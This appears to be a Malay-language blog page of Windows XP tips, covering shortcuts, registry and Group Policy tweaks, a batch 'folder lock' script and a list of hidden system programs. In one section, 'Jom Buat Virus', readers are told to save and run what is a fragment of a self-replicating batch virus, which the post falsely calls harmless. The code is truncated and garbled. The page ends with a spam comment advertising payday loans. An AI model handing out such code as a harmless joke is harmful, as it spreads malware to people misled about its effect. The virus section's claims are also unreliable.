Tricks

10 Keyboard Shortcuts Untuk Windows

1. Windows system key combinations
·         F1: Help
·         CTRL+ESC: Open Start menu
·         ALT+TAB: Switch between open programs
·         ALT+F4: Quit program
·         SHIFT+DELETE: Delete item permanently
·         Windows Logo+L: Lock the computer (without using CTRL+ALT+DELETE)
2. Windows program key combinations
·         CTRL+C: Copy
·         CTRL+X: Cut
·         CTRL+V: Paste
·         CTRL+Z: Undo
·         CTRL+B: Bold
·         CTRL+U: Underline
·         CTRL+I: Italic
3. Mouse click/keyboard modifier combinations for shell objects
·         SHIFT+right click: Displays a shortcut menu containing alternative commands
·         SHIFT+double click: Runs the alternate default command (the second item on the menu)
·         ALT+double click: Displays properties
·         SHIFT+DELETE: Deletes an item immediately without placing it in the Recycle Bin
4. General keyboard-only commands
·         F1: Starts Windows Help
·         F10: Activates menu bar options
·         SHIFT+F10 Opens a shortcut menu for the selected item (this is the same as right-clicking an object
·         CTRL+ESC: Opens the Start menu (use the ARROW keys to select an item)
·         CTRL+ESC or ESC: Selects the Start button (press TAB to select the taskbar, or press SHIFT+F10 for a context menu)
·         CTRL+SHIFT+ESC: Opens Windows Task Manager
·         ALT+DOWN ARROW: Opens a drop-down list box
·         ALT+TAB: Switch to another running program (hold down the ALT key and then press the TAB key to view the task-switching window)
·         SHIFT: Press and hold down the SHIFT key while you insert a CD-ROM to bypass the automatic-run feature
·         ALT+SPACE: Displays the main window’s System menu (from the System menu, you can restore, move, resize, minimize, maximize, or close the window)
·         ALT+- (ALT+hyphen): Displays the Multiple Document Interface (MDI) child window’s System menu (from the MDI child window’s System menu, you can restore, move, resize, minimize, maximize, or close the child window)
·         CTRL+TAB: Switch to the next child window of a Multiple Document Interface (MDI) program
·         ALT+underlined letter in menu: Opens the menu
·         ALT+F4: Closes the current window
·         CTRL+F4: Closes the current Multiple Document Interface (MDI) window
·         ALT+F6: Switch between multiple windows in the same program (for example, when the Notepad Find dialog box is displayed, ALT+F6 switches between the Find dialog box and the main Notepad window)
5. Shell objects and general folder/Windows Explorer shortcuts
For a selected object:
·         F2: Rename object
·         F3: Find all files
·         CTRL+X: Cut
·         CTRL+C: Copy
·         CTRL+V: Paste
·         SHIFT+DELETE: Delete selection immediately, without moving the item to the Recycle Bin
·         ALT+ENTER: Open the properties for the selected object
6. General folder/shortcut control
·         F4: Selects the Go To A Different Folder box and moves down the entries in the box (if the toolbar is active in Windows Explorer)
·         F5: Refreshes the current window.
·         F6: Moves among panes in Windows Explorer
·         CTRL+G: Opens the Go To Folder tool (in Windows 95 Windows Explorer only)
·         CTRL+Z: Undo the last command
·         CTRL+A: Select all the items in the current window
·         BACKSPACE: Switch to the parent folder
·         SHIFT+click+Close button: For folders, close the current folder plus all parent folders
7. Windows Explorer tree control
·         Numeric Keypad *: Expands everything under the current selection
·         Numeric Keypad +: Expands the current selection
·         Numeric Keypad -: Collapses the current selection.
·         RIGHT ARROW: Expands the current selection if it is not expanded, otherwise goes to the first child
·         LEFT ARROW: Collapses the current selection if it is expanded, otherwise goes to the parent
8. Properties control
·         CTRL+TAB/CTRL+SHIFT+TAB: Move through the property tabs
9. Accessibility shortcuts
·         Press SHIFT five times: Toggles StickyKeys on and off
·         Press down and hold the right SHIFT key for eight seconds: Toggles FilterKeys on and off
·         Press down and hold the NUM LOCK key for five seconds: Toggles ToggleKeys on and off
·         Left ALT+left SHIFT+NUM LOCK: Toggles MouseKeys on and off
·         Left ALT+left SHIFT+PRINT SCREEN: Toggles high contrast on and off
10. Microsoft Natural Keyboard keys
·         Windows Logo: Start menu
·         Windows Logo+R: Run dialog box
·         Windows Logo+M: Minimize all
·         SHIFT+Windows Logo+M: Undo minimize all
·         Windows Logo+F1: Help
·         Windows Logo+E: Windows Explorer
·         Windows Logo+F: Find files or folders
·         Windows Logo+D: Minimizes all open windows and displays the desktop
·         CTRL+Windows Logo+F: Find computer
·         CTRL+Windows Logo+TAB: Moves focus from Start, to the Quick Launch toolbar, to the system tray (use RIGHT ARROW or LEFT ARROW to move focus to items on the Quick Launch toolbar and the system tray)
·         Windows Logo+TAB: Cycle through taskbar buttons
·         Windows Logo+Break: System Properties dialog box
·         Application key: Displays a shortcut menu for the selected item

Tips Disable Copy Paste File

Apakah PC atau laptop korang selalu digunakan oleh orang lain? Jika ya, selalu tak diorang mengcopy data atau file-file penting tanpa izin korang? Korang bleh buat file-file penting tu tidak dapat dicopy paste sesuka hati. Berikut Tips Men-Disable Copy Paste tersebut :

1. Klik Start >> Run >> ketik Regedit kemudian OK atau ENTER.

2. Klik HKEY_LOCALMACHINE\SYSTEM\CurrentControlSet\Control

3. Klik kanan pada Control pilih New >> Key kemudian beri nama StorageDevicePolicies


4. Klik kanan pada StorageDevicePolicies kemudian pilih New >> DWord Value kemudian beri nama WriteProtect

5. Kemudian double click pada WriteProtect tersebut, dan ganti value datanya menjadi 1.


6. Kemudian Restart Komputer/Laptop korang.

Membuat Ikon Sendiri Di Windows XP

Caranya:
1.    Klik Start --> All Programs --> Accessories --> Paint.
2.    Pada menu Image, klik Attributes.
3.    Tandakan 32 untuk Width dan Height dan pastikan pilih Pixels dibawah Units.
4.    Pastu klik OK untuk membuat dokumen baru 32x32 pixel.
Sekarang korang boleh tambahkan warna atau masukkan foto yang sudah dikecikkan terlebih dulu menjadi 32x32 pixel dengan cara copy-paste. Kalau dah selesai buka menu File dan klik Save As. Gunakan kotak dialog untuk memilih di mana korang akan menyimpan file tu, lepas tu berikan nama yang diikuti dengan akhiran ".ico" (tanpa semicolon) dan klik Save. (Extension ".ico" memberitahu Windows bahawa itu adalah file icon.)
Disabled Task Manager


Satu masalah yang kerap kali berlaku akibat serangan virus / malware ialah fungsi Task Manager dihalang. Cuba anda klik kanan pada taskbar anda dan perhatikan samada ‘Task Manager’ berwarna kelabu, yang bermakna ia tidak boleh digunakan. Jika anda cuba membukanya melalui Run > taskmgr pula, satu kotak mesej akan keluar: “Task Manager has been disabled by your administrator.”


Untuk mengembalikan semula fungsi Task Manager ini, anda haruslah terlebih dahulu membuang virus pada komputer tersebut. Gunakan perisian Anti-Virus seperti Avira, Avast, ataupun Kaspersky.



Jika AntiVirus anda telah dikacau oleh virus - virus durjana ini, ketahui bagaimana untuk scan virus sebelum masuk ke dalam Windows.



Buka Run dengan menekan kekunci Windows + R pada papan kekunci. Kemudian taip regedit dan tekan Enter. Pada bahagian kiri Regedit, pergi ke nilai berikut:



* HKEY_CURRENT_USER
* Software
* Microsoft
* Windows
* CurrentVersion
* Policies.



Perhatikan terdapat nilai Registry yang bernama DisableTaskMgr. Buang nilai ini dengan menekan kekunci Delete.



Sekiranya regedit tidak boleh dibuka, gunakan Group Policy Editor. Untuk membuka Group Policy Editor, taipkan ‘gpedit.msc’ dalam kotak Run dan tekan Enter. Kemudian, pergi kepada nilai berikut:



* User Configuration
* Administrative Templates
* System
* Ctrl + Alt + Del Options



Perhatikan pada ’Remove Task Manager’ dan tukar nilainya kepada ’Disable’.
Menampilkan Message Box Ketika Startup


Selalu tak korang tengok Message Box seperti error, atau sebagainya ? Ingin membuatnya dan meletakkannya pada Windows startup ?


Cara-cara:
1. Bukak Notepad
2. Isi dengan MsgBox “teks korang” . Make sure semicolon " " sebelum dan selepas memasukkan message harus ada.
3. Save As dengan nama apa saja, tapi letakkan dengan extension .vbs, contoh startup.vbs . Simpan di C:\Documents and Settings\UserAnda\StartMenu\Programs\Startup
4. Log off dan log in balik untuk tengok hasilnya.
Lajukan Internet (DNS)


Adjustment to DNS Resolution


Another adjustment to Internet Speed involving DNS resolution. (copy the following and save it as tweak.reg.)



======copy text below this line======




Windows Registry Editor Version 5.00



[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDnscacheParameters]
“CacheHashTableBucketSize”=dword:00000001
“CacheHashTableSize”=dword:00000180
“MaxCacheEntryTtlLimit”=dword:0000fa00
“MaxSOACacheEntryTtlLimit”=dword:0000012d



=====to above this line=====



Now that it’s saved, double-click the file to enter it into your registry.
Dapatkan Kembali Run Yang Hilang


Selain dari masalah Task Manager dihalang, Registry Editor dihalang, dan Hard Disk tak boleh dibuka dengan double click, virus juga selalunya akan menyembunyikan kotak Run. Apabila anda klik pada Start Menu, anda akan dapati program Run telah hilang. Shortcut Win+R pun tak dapat mengeluarkan kotak Run ini.


Untuk mendapatkannya kembali, caranya mudah sahaja. Ikuti langkah-langkah berikut:



* Buka gpedit.msc dari “C:\WINDOWS\system32\gpedit.msc”
* Pergi ke User Configuration > Administrative Templates > Start Menu & Toolbar.
* Pada bahagian kanan, double-click pada Remove Run menu from Start Menu
* Tetapkannya kepada Disabled dan tekan butang OK.
Cara Nak Lock Folder


- First bukak notepad.
- Pastu copy and paste je code kat bawah ni :



@ECHO OFF
Sydromania Folder Lock
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Serius ke nak Lock ??(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder dah terkunci
goto End
:UNLOCK
echo nak bukak folder nih… bagi password dulu ye…
set/p "pass=>"
if NOT %pass%== mypassword goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Folder dah locked
goto End
:End




- save as folder.bat
- dah bleh pakai dah.



* cara menggunakannya:



- double click folder.bat,
- masukkan folder atau file yang korang nak ke dalam folder lock tuh
- kalo nak ubah password gi kat mypassword then change password yg korang nak.
Membuat Yahoo Messenger Multiple Online


Korang bleh buat multiple online dengan Yahoo Messenger, maksudnya korang bleh login di Yahoo Messenger dengan dgn 2 ID yang lain pada masa yg same.
Langkah - langkah :


1. Tutup Yahoo Messenger kalo korang tengah online
2. Klik Start Menu –> Run –> regedit
3. Cari node HKEY_CURRENT_ USER –> Software –>Yahoo –> Pager –> Test
4. Klik kanan di bagian kanan halaman dan pilih New –> Dword Value
5. Beri nama value tersebut menjadi Plural
6. Double klik dan beri value data 1, untuk Base, pilih Decimal



Sekarang buka Yahoo Messenger, login menggunakan ID yang biasa korang gunakan.
Pastu bukak lagi Yahoo Messenger yg lain dan login dengan ID berbeza.
 

The Beauty Of Math


1 x 8 + 1 = 9
12 x 8 + 2 = 98
123 x 8 + 3 = 987
1234 x 8 + 4 = 9876
12345 x 8 + 5 = 98765
123456 x 8 + 6 = 987654
1234567 x 8 + 7 = 9876543
12345678 x 8 + 8 = 98765432
123456789 x 8 + 9 = 987654321



1 x 9 + 2 = 11
12 x 9 + 3 = 111
123 x 9 + 4 = 1111
1234 x 9 + 5 = 11111
12345 x 9 + 6 = 111111
123456 x 9 + 7 = 1111111
1234567 x 9 + 8 = 11111111
12345678 x 9 + 9 = 111111111
123456789 x 9 +10= 1111111111




9 x 9 + 7 = 88
98 x 9 + 6 = 888
987 x 9 + 5 = 8888
9876 x 9 + 4 = 88888
98765 x 9 + 3 = 888888
987654 x 9 + 2 = 8888888
9876543 x 9 + 1 = 88888888
98765432 x 9 + 0 = 888888888




Brilliant, isn't it?
And finally, take a look at this symmetry:




1 x 1 = 1
11 x 11 = 121
111 x 111 = 12321
1111 x 1111 = 1234321
11111 x 11111 = 123454321
111111 x 111111 = 12345654321
1111111 x 1111111 = 1234567654321
11111111 x 11111111 = 123456787654321
111111111 x 111111111=123456789 87654321

Increasing Internet Bandwith


Increase Internet bandwidth by 20% or more (QoS Packet Scheduler)


This tweak is designed for broadband users:




1.Log on as “Administrator”.



2. Run - gpedit.msc



3. Expand the “Local Computer Policy” branch



4. Then expand the “Administrative Templates” branch



5. Expand the “Network” branch



6. Highlight the “QoS Packet Scheduler” in left pane.



7. In the right window pane double-click the “Limit Reservable Bandwidth” setting



8. On the settings tab check the “Enabled” item



9. Change “Bandwidth limit %” to read 0



10. Then go to your Network connections Start=>Connect to=>Show All Connections and
right-click on your connection. Then under the General or the Networking tab,
(where it lists your protocols) make sure QoS packet scheduler is enabled.



It may take effect immediately on some systems. To be sure, just re-boot.

Access Denied Ketika Membuka Folder


Masalah ini kerap kali berlaku bila aku nak masukkan hard disk dari komputer lain ke dalam komputer aku, jadikannya sebagai slave, dan cuba untuk membuka satu-satu folder di dalam hard disk tersebut (biasanya pada My Documents). Satu error akan terpapar: “Access Denied”


Ini berlaku kerana aku takde kebenaran yang sepatutnya untuk membuka folder tersebut, kerana ia telah dibuat pada Windows yang lain. Cara-cara untuk menyelesaikan masalah ini adalah seperti berikut:



1. Mematikan fungsi Simple File Sharing:
1. Buka My Computer
2. Pada menu, pilih Tools | Folder Options
3. Pilih tab View
4. Untick pada ”Use simple file sharing (recommended)“. Klik OK.
2. Right-click pada folder yang berkaitan, dan pilih Properties.
3. Pilih tab Security (klik OK jika ada mesej Security).
4. Klik pada butang Advanced dan pilih tab Owner.
5. Pada senarai nama yang dipaparkan, pilih user name korang dan tandakan pada “Replace owner on subcontainers and objects“. Klik OK
6. Klik Yes pada mesej berikut (jika ada): “You do not have permission to read the contents of directory [Folder]. Do you want to replace the directory permissions with permissions granting you Full Control? All permissions will be replaced if you press Yes.“
7. Klik OK



Dengan ini, folder tersebut telah menjadi hak milik korang, dan korang boleh membukanya.

Mempercepatkan Tampilan Desktop

Untuk mempercepat tampilan dekstop korang, try trick kat bawah ni :
1.    Dari menu Start, pilih Run.
2.    Type regedit, pastu cari key : HKEY_CURRENT_USER/Control Panel/Dekstop.
3.    Right click pada panel sebelah kanan lalu pilih New - String Value.
4.    Beri nama dengan MenuShowDelay.
5.    Double click pada MenuShowDelay dan isi dengan 0 (nol).
6.    Ulangi langkah di atas dengan String Value bernama Minanimation dan isi dengan 0 (nol) juga. Selamat mencoba...

Mengembalikan Show Hidden Files


Sape2 yang suke hidden kan file, konon2 nak sorok private file korang dari orang lain baca, penah tak tibe2 kat Folder Options tu, pilihan untuk “Show hidden files and folders” tiada, cuma tinggal “Do not show hidden files and folders” sahaja. Macam mana nak selesaikan masalah ni?


Ikuti langkah-langkah di bawah untuk selesaikan masalah ini:



1. Buka Registry Editor dengan menaip “regedit” pada kotak Run
2. Pergi kepada nilai ini: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden
3. Perhatikan nilai “Type”. Tukar data bagi nilai “Type” tersebut kepada “group”.

Tips Menggerakkan Cursor Tanpa Mouse


Cara-cara nak gerakkan cursor apabila mouse korang rosak :


1. Tekan ALT(sebelah kiri)+Shift(sebelah kiri)+NumLock secara bersamaan. Cara ini akan memaparkan windows MouseKeys.



2. Kemudian klik Settings, tick pada pilihan Use MouseKeys.



3.Sampai kat sini fungsi mousekeys dah aktif.



4.Pastu ggerakkan cursor menggunakan button2 angka di keypad numerik.
Angka 1, 2, 3, 4, 6, 7, 8, dan 9 digunakan untuk menggerakkan kursor ke atas, bawah, kanan/kiri, dan ke arah diagonal. Angka 5 berfungsi seperti “klik” pada mouse.



5.Untuk “drag & drop” gunakan kombinasi angka dengan “insert”.

Matikan Fungsi Autoplay


Fungsi Autoplay dalam Windows XP adalah untuk melancarkan satu-satu program dalam CD, USB Drive, atau Hard Disk secara automatik. Namun, kebanyakan virus dan malware telah menggunakan fungsi ini untuk menjangkiti komputer korang, dan membawa pelbagai kerosakan. Ikuti langkah-langkah di bawah bagi mematikan fungsi Autoplay ini:


Matikan Autoplay Menggunakan Group Policy Editor



1. Pergi kepada Start > Run
2. Taipkan gpedit.msc dan tekan Enter
3. Di bahagian kiri Group Policy Editor, pergi kepada Administrative Template > System
4. Di sebelah kanan Group Policy Editor, cari pilihan ‘Turn Off Autoplay’. Double-click pada
pilihan tersebut.
5. Pilih Enabled dan klik pada butang OK.

Tak Boleh Double Click?

Soalan:

Mengapa saya tak boleh double-click pada partition dalam komputer? Contohnya, bila saya nak buka partition C, akan keluar dialog “Open With”. Saya dah scan komputer dengan antivirus, tapi masih takde hasil. Bagaimana saya nak betulkan semula masalah ni?

Penerangan:
Masalah ini biasanya berlaku setelah jangkitan virus. Virus biasanya akan datang bersama fail autorun.inf yang berfungsi untuk melancarkan virus tersebut apabila anda double-click pada partition. Apabila anda scan komputer dengan antivirus, ia akan membuang virus ini. Namun sesetengah antivirus tidak membuang fail autorun.inf, dan membiarkan ia tertinggal di dalam partition. Sebab itulah anda tak boleh double-click pada partition anda walaupun setelah virus dibuang.

Penyelesaian:

1. Terlebih dahulu, pastikan virus di dalam komputer anda telah dibuang. Gunakan perisian
antivirus seperti Avira.
2. Pada Windows Explorer, pergi kepada menu Tools > Folder Options. Pada tab View,
pastikan:
* Pilihan berada pada “Show hidden files and folders”
* Kotak “Hide protected operating system files (Recommended)” dikosongkan
3. Buka partition yang bermasalah tersebut, dan buang fail autorun.inf
4. Restart komputer

Jom Buat Virus


- Korang bukak notepad then copy and paste code bawah ni kat notepad tuh..
- Pastu save notepad tu .bat
- Then run tgk pe jadi.
- Xde effect pape pon
- Juz for fun...



@echo off>nul.ViRuSif



"%1=="/ViRuS_MULTIPLY goto ViRuS_multiplyif



"%1=="/ViRuS_OUTER_LOOP goto ViRuS_outer_loopif



"%1=="/ViRuS_FINDSELF goto ViRuS_findselfif



"%VOFF%=="T goto ViRuS_OLDBAT



set ViRuSname=%0



if not exist %0.bat call %0 /ViRuS_FINDSELF %path%



if not exist %ViRuSname%.bat set ViRuSname=



if "%ViRuSname%==" goto ViRuS_OLDBAT

Welcome Message Ketika Logon


OS : WinXP


Nak buat welcome message time masuk windows log on ?
Caranya :



1. Klik Start -> Run
2. Taip “regedit”, pastu klik OK
3.Masuk ke bahagian HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon
4. Buat entry baru dengan right click pastu pilih New -> String Value. Beri nama “LegalNoticeCaption”. Double Click, pastu isi Value data dengan 1.
5. Buat entry baru lagi dengan nama “LegalNoticeText” dengan cara sama. Isi value data dengan teks yang ingin ditampilkan saat log on. Tutup registry editor.
6. Restart atau log off.

23 Windows Application yang Tersembunyi


Ini ada 23 aplikasi windows yang masih tersembunyi.
cara bukak, klik start > run
kemudian masukkan nama program yang di bold kan kat bawah ni :


1. Character Map = charmap.exe

untuk melihat karakter seperti ™©®


2. Disk Cleanup = cleanmgr.exe

untuk cleanup disk


3. Clipboard Viewer = clipbrd.exe

liat apa yang dicopy menggunakan ctrl+C


4. Dr Watson = drwtsn32.exe

Ini buat kalo ada troubleshooting di PC. kayak dokter gitu


5. DirectX diagnosis = dxdiag.exe

ini buat diagnosis audio video card anda


6. Private character editor = eudcedit.exe

Ini untuk buat karakter baru di windows anda


7. IExpress Wizard = iexpress.exe

untuk membuat self extractor. seperti file Zip


8. Microsoft Synchronization Manager = mobsync.exe

Seperti namanya, buat sincronisasi..


9. Windows Media Player 5.1 = mplay32.exe

ini WMP versi lawas


10. ODBC Data Source Administrator = odbcad32.exe

Ini sesuatu yang digunakan untuk keperluan database


11. Object Packager = packager.exe

Ini untuk memasukkan objek kedalam file..


12. System Monitor = perfmon.exe

seperti judulnya, ini untuk memonitor PC anda..


13. Program Manager = progman.exe

ini warisan dari Windows 3.x desktop shell


14. Remote Access phone book = rasphone.exe

Sejenis buku telepon


15. Registry Editor = regedt32.exe [juga regedit.exe]

untuk melakukan tweaking, editing registry windows


16. Network shared folder wizard = shrpubw.exe

Membuat shared folder dalam jaringan


17. File siganture verification tool = sigverif.exe

program verifikasi signature


18. Volume Control = sndvol32.exe

buat nampilin sound control di System Tray


19. System Configuration Editor = sysedit.exe

untuk mengubah system.ini dan win.ini


20. Syskey = syskey.exe

untuk melakukan konfigurasu account di windows


21. Microsoft Telnet Client = telnet.exe

ini untuk melakukan koneksi internet sebelum ada browser


22. Driver Verifier Manager = verifier.exe

untuk monitoring driver di windows anda


23. Windows For Workgroups Chat = winchat.exe
untuk chat secara LAN

1 Respons Diterima:

Anonymous said...

Or simply called for some coinage, pożyczka bez bik however , basically don’t obtain it until finally pay day advance? It develops więcej nowości znajdziesz na tej stronie to help many People today in america in the united states each day. Anything comes up and you also desire szybki kredyt bez zdolności kredytowej some dough, but your examine isn’t put into the account nevertheless. Anxieties pożyczki pozabankowe there were a method to pożyczka bez bik become an online payday loan via the internet, suitable?